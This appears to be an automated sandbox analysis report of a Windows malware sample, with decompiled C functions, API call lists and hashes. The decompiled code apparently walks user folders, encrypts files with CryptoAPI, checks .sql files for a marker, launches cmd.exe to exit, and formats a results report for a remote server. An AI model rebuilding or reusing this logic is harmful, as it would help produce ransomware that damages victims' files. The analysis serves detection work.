							}
							VirtualFree(_v36, 0, 0x8000);
						}
						_t133 = _v24;
						if(_t133 != 0) {
							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
							 *_v40 = _t95;
							if(_t95 != 0) {
								lstrcpyA(_t95, _t133);
							}
						}
						_t88 = GetProcessHeap;
						if(_t127 != 0) {
							HeapFree(GetProcessHeap(), 0, _t127);
							_t88 = GetProcessHeap;
						}
						if(_t133 != 0) {
							HeapFree( *_t88(), 0, _t133);
						}
						_t129 = _v12;
						L26:
						VirtualFree(_v44, 0, 0x8000);
						return _t129;
					}
				}
			}

0x00a8505d
0x00a85062
0x00a85065
0x00a8506b
0x00a85071
0x00a85079
0x00a8507c
0x00a8507c
0x00a85082
0x00a85084
0x00a85089
0x00a85094
0x00a85094
0x00a85090
0x00a85090
0x00a85090
0x00a85096
0x00a850a5
0x00a850ab
0x00a850ad
0x00a8525e
0x00000000
0x00a850b3
0x00a850b3
0x00a850b8
0x00a850c0
0x00a850c3
0x00a850c6
0x00a850cc
0x00a850d0
0x00a850da
0x00a850e6
0x00a850eb
0x00a850f2
0x00a8510e
0x00a8511c
0x00a85124
0x00a85127
0x00a8512a
0x00a85130
0x00a85139
0x00a85266
0x00a8526b
0x00a8526c
0x00a8526d
0x00a8526e
0x00a8526f
0x00a85276
0x00a85277
0x00a85278
0x00a85287
0x00a8528f
0x00a85299
0x00a8529c
0x00a852bb
0x00a852bd
0x00a852c0
0x00a852c3
0x00a852d4
0x00a852da
0x00a852dd
0x00a852df
0x00a852ea
0x00a852f0
0x00a852f3
0x00a852f5
0x00a852f7
0x00a852f7
0x00a852fb
0x00a852fe
0x00a85305
0x00a85307
0x00a8530a
0x00a85310
0x00a85312
0x00a85314
0x00a85316
0x00a85316
0x00a85319
0x00a85323
0x00a8531b
0x00a8531b
0x00a8531d
0x00a8531e
0x00a8531e
0x00a85328
0x00a85329
0x00a8532f
0x00a85334
0x00a85334
0x00a85316
0x00a8533b
0x00a85341
0x00a85344
0x00a85344
0x00a8534a
0x00a8534a
0x00a85351
0x00a85351
0x00a8536b
0x00a8513f
0x00a8513f
0x00a85142
0x00a8514b
0x00a85152
0x00a8515f
0x00a85162
0x00a85162
0x00a85168
0x00a8516a
0x00a8516f
0x00a8517a
0x00a8517a
0x00a85176
0x00a85176
0x00a85176
0x00a85192
0x00a851aa
0x00a851ae
0x00a851c8
0x00a851d2
0x00a851ca
0x00a851ca
0x00a851ca
0x00a851c8
0x00a851d8
0x00a851e8
0x00a851e8
0x00a851ee
0x00a851f3
0x00a85207
0x00a8520c
0x00a85210
0x00a85214
0x00a85214
0x00a85210
0x00a85220
0x00a85227
0x00a8522f
0x00a85231
0x00a85231
0x00a85238
0x00a85240
0x00a85240
0x00a85242
0x00a85245
0x00a8524f
0x00a8525d
0x00a8525d
0x00a85139

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 00A85065
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00A85082
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A850A5
_memset.LIBCMT ref: 00A850F2
lstrlenA.KERNEL32(?), ref: 00A850FE
lstrlenA.KERNEL32(?,00000000), ref: 00A85152
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00A85168
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00A8518A
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A851A8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 00A851C0
GetLastError.KERNEL32 ref: 00A851D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A851E8
lstrlenA.KERNEL32(00A854E4,00003000,00000004,00000000), ref: 00A851FD
VirtualAlloc.KERNEL32(00000000,00000001), ref: 00A85207
lstrcpyA.KERNEL32(00000000,00A854E4), ref: 00A85214
HeapFree.KERNEL32(00000000), ref: 00A8522F
HeapFree.KERNEL32(00000000), ref: 00A85240
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A8524F
GetLastError.KERNEL32 ref: 00A8525E

Part of subcall function 00A84FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,00A8526B,00000000), ref: 00A84FE6
Part of subcall function 00A84FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00A84FF8
Part of subcall function 00A84FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00A85008
Part of subcall function 00A84FD0: wsprintfW.USER32 ref: 00A85019
Part of subcall function 00A84FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00A85033
Part of subcall function 00A84FD0: ExitProcess.KERNEL32 ref: 00A8503B

Strings

#shasj, xrefs: 00A850B3

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
String ID: #shasj
API String ID: 463976167-2423951532
Opcode ID: 544565fe09d30b39019b57a554b1c8fa86d4c45c1a93912f3ca00e1bd9c2010e
Instruction ID: 2a4821ae3f5ebb8c585fcc22f7cc1167bd78b4bd26c56f6ae900d60eac04203c
Opcode Fuzzy Hash: 544565fe09d30b39019b57a554b1c8fa86d4c45c1a93912f3ca00e1bd9c2010e
Instruction Fuzzy Hash: F5519271E44215ABDB21EBE59C49FFFBBB8EF48B10F140155FA05B6290DB709901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A864A0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A864A0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00A87C10(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E00A86440(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x00a864ab
0x00a864af
0x00a864be
0x00a864c1
0x00a864c4
0x00a864de
0x00a864e3
0x00a864e6
0x00a864f0
0x00a86500
0x00000000
0x00a8651c
0x00a86524
0x00a8652b
0x00a86531
0x00a86534
0x00a86539
0x00a86608
0x00a86608
0x00000000
0x00a86540
0x00a86540
0x00a86546
0x00a86549
0x00a8654a
0x00000000
0x00000000
0x00000000
0x00a8654a
0x00a8654e
0x00000000
0x00a86554
0x00a8655a
0x00a8655e
0x00000000
0x00a86564
0x00a86577
0x00a86582
0x00a86586
0x00a8658f
0x00a865a0
0x00a865a4
0x00a865b7
0x00a865ce
0x00a865d4
0x00a865de
0x00a865de
0x00a865e9
0x00a865e9
0x00a865ef
0x00a865ef
0x00a865f3
0x00a865f9
0x00a865fe
0x00a8660a
0x00a8660f
0x00000000
0x00a8660f
0x00a865fe
0x00a8655e
0x00a8654e
0x00a86539
0x00000000
0x00a86612
0x00a86622
0x00a8662d
0x00a8663b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00A864B2
lstrcatW.KERNEL32(00000000,00A90364), ref: 00A864C4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00A864D2
lstrcmpW.KERNEL32(?,00A90368,?,?), ref: 00A864FC
lstrcmpW.KERNEL32(?,00A9036C,?,?), ref: 00A86512
lstrcatW.KERNEL32(00000000,?), ref: 00A86524
lstrlenW.KERNEL32(00000000,?,?), ref: 00A8652B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 00A8655A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00A86571
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 00A8657C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 00A8659A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 00A865AF
lstrlenA.KERNEL32(*******************,?,?), ref: 00A865CE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 00A865E9
CloseHandle.KERNEL32(00000000,?,?), ref: 00A865F3
FindNextFileW.KERNEL32(?,?,?,?), ref: 00A8661C
FindClose.KERNEL32(?,?,?), ref: 00A8662D

Strings

.sql, xrefs: 00A86554
*******************, xrefs: 00A865B9, 00A865C9

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 365ec74a9f6d46e3ea58c6a7f67833ca6a5c37c12c7a298b89cbeeba2b0d1914
Instruction ID: 8c69ae9a91acf634843b5f8829c04119469a62dce3f1b37f45e4d1b0dcf2db82
Opcode Fuzzy Hash: 365ec74a9f6d46e3ea58c6a7f67833ca6a5c37c12c7a298b89cbeeba2b0d1914
Instruction Fuzzy Hash: D3416C71A4121AABEB24EBA09C8DFBF77BCFF04740F144565F902E6150EB709A02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A85540 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00A85540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E00A839B0( &_v180);
				E00A86D90( &_v180);
				E00A86BA0( &_v180);
				E00A869A0( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xa90128]");
				_v28 = _t79;
				_t80 =  *0xa90134; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xa90136; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E00A88B30( &_v435, 0, 0xff);
				E00A85C40( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E00A85CF0( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E00A85370(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E00A87720( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x00a85540
0x00a8555a
0x00a8555c
0x00a8555f
0x00a85565
0x00a8556a
0x00a85576
0x00a85578
0x00a8556c
0x00a8556c
0x00a8556c
0x00a85572
0x00a85572
0x00a8557a
0x00a8557e
0x00a8558d
0x00a85596
0x00a85598
0x00a85599
0x00a8559e
0x00a855a0
0x00a855a1
0x00a855a3
0x00a855a4
0x00a855a6
0x00a855a7
0x00a855a9
0x00a855aa
0x00a855af
0x00a855b1
0x00a855b2
0x00a855ba
0x00a855c5
0x00a855d0
0x00a855e8
0x00a855ee
0x00a855f0
0x00a855f6
0x00a855f8
0x00a85606
0x00a85609
0x00a85615
0x00a85619
0x00a85622
0x00a85627
0x00a8562a
0x00a85631
0x00a8564d
0x00a85655
0x00a85662
0x00a85671
0x00a8568a
0x00a8568c
0x00a8568c
0x00a856a2
0x00a856a2
0x00a856af
0x00a856b2
0x00a856b4
0x00a856b7
0x00a856bc
0x00a856c5
0x00a856c5
0x00a856be
0x00a856be
0x00a856c3
0x00000000
0x00000000
0x00a856c3
0x00a856cd
0x00a856d3
0x00a856d5
0x00a856d8
0x00a856d8
0x00a856dd
0x00a856e3
0x00a856e5
0x00a856e5
0x00a856e7
0x00a856ee
0x00a856d8
0x00a856f9
0x00a85713
0x00a85720
0x00a85728
0x00a85737
0x00a8573b
0x00a85741

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 00A8555F
wsprintfW.USER32 ref: 00A8558D
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 00A855DC
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 00A855EE
_memset.LIBCMT ref: 00A85631
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00A8563D
CryptBinaryToStringA.CRYPT32(?,746569A0,40000001,00000000,00000000), ref: 00A85682
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 00A8568C
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00A85699
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 00A856A8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00A856B2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00A856CF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00A856E8
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00A85720
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00A85737

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00A85587
#shasj, xrefs: 00A855F0

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 38aecb74b72d108c3c457ef170783887ff1bf0f1908a43f1054095d3cddfd385
Instruction ID: 6249190aee238628be6713b93693df7567e97d3936b3c707070cbb534719f947
Opcode Fuzzy Hash: 38aecb74b72d108c3c457ef170783887ff1bf0f1908a43f1054095d3cddfd385
Instruction Fuzzy Hash: A951B271E00219ABEB11EBA4DC4AFEF7B79FF44700F540165EA05A7190EB706E05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00A86000 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00A86000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xa92ae8);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E00A834F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xa92ae8);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x00a8600b
0x00a86011
0x00a86018
0x00a8602a
0x00a8602e
0x00a86036
0x00a8606e
0x00a8606e
0x00a86091
0x00a86093
0x00a8609c
0x00a860aa
0x00a860b0
0x00a860b6
0x00a860c4
0x00a860d2
0x00a860d8
0x00a860e1
0x00a860e8
0x00a860ed
0x00a860ed
0x00a860e8
0x00a860f8
0x00a86103
0x00000000
0x00a86109
0x00a86038
0x00a86043
0x00000000
0x00a86067
0x00a86054
0x00a8605c
0x00000000
0x00a86065
0x00000000

APIs

EnterCriticalSection.KERNEL32(00A92AE8,?,00A83724,00000000,00000000,00000000,?,00000800), ref: 00A8600B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00A83724,00000000,00000000,00000000), ref: 00A8602E
GetLastError.KERNEL32(?,00A83724,00000000,00000000,00000000), ref: 00A86038
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00A83724,00000000,00000000,00000000), ref: 00A86054
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00A83724,00000000,00000000), ref: 00A86089
CryptGetKeyParam.ADVAPI32(00000000,00000008,00A83724,0000000A,00000000,?,00A83724,00000000), ref: 00A860AA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,00A83724,?,00A83724,00000000), ref: 00A860D2
GetLastError.KERNEL32(?,00A83724,00000000), ref: 00A860DB
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00A83724,00000000,00000000), ref: 00A860F8
LeaveCriticalSection.KERNEL32(00A92AE8,?,00A83724,00000000,00000000), ref: 00A86103

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A86023, 00A86049

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 5f45d36a14346c16d6d89fc22015e56eabc5cd4eecc59cd6facaceeca9ec009c
Instruction ID: 410564f3dd98134807bd5e353d903e5a2a51fa1ff9effc238a56461e4c0aa8b4
Opcode Fuzzy Hash: 5f45d36a14346c16d6d89fc22015e56eabc5cd4eecc59cd6facaceeca9ec009c
Instruction Fuzzy Hash: 3B312A75A40308BFEB10DFE0DC49FAF7BB8AB48B01F108558F601AA1D0DBB49A01DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A866F0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00A866F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E00A864A0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E00A86640(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if((_v616.dwFileAttributes & 0x00000010) == 0) {
										_v16 =  *_t54;
										_t46 = E00A863B0(_t63,  &_v616, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E00A866F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x00a866fc
0x00a866ff
0x00a86701
0x00a86708
0x00a86836
0x00a86836
0x00a8683c
0x00a8671d
0x00a8671d
0x00a86735
0x00a86738
0x00a8673b
0x00a86745
0x00a8674b
0x00a8674d
0x00a86750
0x00a86756
0x00a86764
0x00a86770
0x00a8677c
0x00a86782
0x00a86784
0x00a86796
0x00a8679c
0x00a8679e
0x00a867a8
0x00a867aa
0x00a867b1
0x00a867e2
0x00a867e5
0x00a867ea
0x00a867ed
0x00a867ef
0x00a867f2
0x00a867f5
0x00a867f7
0x00a86800
0x00a86800
0x00a86803
0x00a86803
0x00a867f9
0x00a867fc
0x00a867fe
0x00000000
0x00000000
0x00a867fe
0x00a867f7
0x00a867b3
0x00a867c7
0x00a867cc
0x00a867cc
0x00a8680e
0x00a8680e
0x00a86810
0x00a86810
0x00a8679e
0x00a8681d
0x00a86823
0x00a86823
0x00a8682e
0x00000000
0x00a86758
0x00a86763
0x00a86763
0x00a86756

APIs

Part of subcall function 00A86110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00A86706,00000000,?,?), ref: 00A86123
Part of subcall function 00A86110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00A86706,00000000,?,?), ref: 00A861AE
Part of subcall function 00A86110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00A86706,00000000,?,?), ref: 00A861C8
Part of subcall function 00A86110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00A86706,00000000,?,?), ref: 00A861E2
Part of subcall function 00A86110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00A86706,00000000,?,?), ref: 00A861FC
Part of subcall function 00A86110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00A86706,00000000,?,?), ref: 00A8621C

Part of subcall function 00A864A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00A864B2
Part of subcall function 00A864A0: lstrcatW.KERNEL32(00000000,00A90364), ref: 00A864C4
Part of subcall function 00A864A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00A864D2
Part of subcall function 00A864A0: lstrcmpW.KERNEL32(?,00A90368,?,?), ref: 00A864FC
Part of subcall function 00A864A0: lstrcmpW.KERNEL32(?,00A9036C,?,?), ref: 00A86512
Part of subcall function 00A864A0: lstrcatW.KERNEL32(00000000,?), ref: 00A86524
Part of subcall function 00A864A0: lstrlenW.KERNEL32(00000000,?,?), ref: 00A8652B
Part of subcall function 00A864A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 00A8655A
Part of subcall function 00A864A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00A86571
Part of subcall function 00A864A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 00A8657C
Part of subcall function 00A864A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 00A8659A
Part of subcall function 00A864A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 00A865AF

Part of subcall function 00A86640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00A86722,00000000,?,?), ref: 00A86655
Part of subcall function 00A86640: wsprintfW.USER32 ref: 00A86663
